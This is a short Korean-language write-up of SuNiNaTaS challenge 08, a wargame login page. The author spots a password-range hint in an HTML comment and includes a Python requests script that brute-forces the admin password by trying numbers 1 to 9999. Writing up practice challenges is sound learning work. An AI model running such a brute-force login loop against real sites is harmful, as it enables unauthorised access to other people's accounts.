[suninatas] Game 08

문제: http://suninatas.com/challenge/web08/web08.asp

로그인 폼이 하나있다. Password Incorrect!라고 되어 있는데 왠지 password를 구해야 하는 문제 같다.

개발자 도구를 열어보면 주석에 힌트가 숨겨져 있는 것을 볼 수 있다.

 

예상대로 admin의 password를 찾아서 로그인해야 하는 문제다.

주석에 친절하게도 비밀번호의 범위를 보여주고 있다.

여기서 브루트 포스로 해결할 수 있는 문제라는 것을 알 수 있다.

코드를 작성해서 password를 구했다.

 

 

 

import requests

url = "http://suninatas.com/challenge/web08/web08.asp"
data = {"id": "admin"}

for i in range(1, 10000):
	data["pw"] = str(i)
	r = requests.post(url, data=data)
	if r.text.find("Password Incorrect!") == -1:
		print("Password :", i)
		break;
	print(i)